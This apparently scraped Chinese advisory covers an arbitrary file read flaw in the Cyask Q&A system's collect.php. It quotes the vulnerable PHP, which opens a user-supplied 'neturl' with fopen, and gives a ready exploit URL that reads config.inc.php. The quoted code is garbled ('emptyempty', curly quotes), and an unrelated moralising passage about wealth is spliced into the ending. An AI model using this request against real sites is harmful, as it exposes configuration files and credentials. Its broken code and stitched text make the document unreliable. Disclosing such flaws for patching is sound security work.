影响版本:
Cyask
程序介绍:
Cyask国内较为多人使用的仿百度风格的Ask系统。
漏洞分析:
从Collect.php代码当中可以看到
else
{
/*
检查网址
*/
$url=get_referer();
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=emptyempty($neturl) ? $url : $neturl;
$contents = ”;
if($fid=@fopen($collect_url,”r“))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message(’collect_url_error’, ”);
exit;
}
漏洞利用:
http://www.target.com/collect.php?neturl=config.inc.php
解决方案:
厂商补丁:
cyask
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载
以上就是cyask知道系统collect.php页面存在越权漏洞。财富应当用正当的手段去谋求,应当慎重地使用,应当慷慨地用以济世,而到临死应当无留恋地与之分手。巨大的财富具有充分的诱惑力,足以稳稳当当地起到致命的作用,把那些道德基础并不牢固的人引入歧途。更多关于cyask知道系统collect.php页面存在越权漏洞请关注haodaima.com其它相关文章!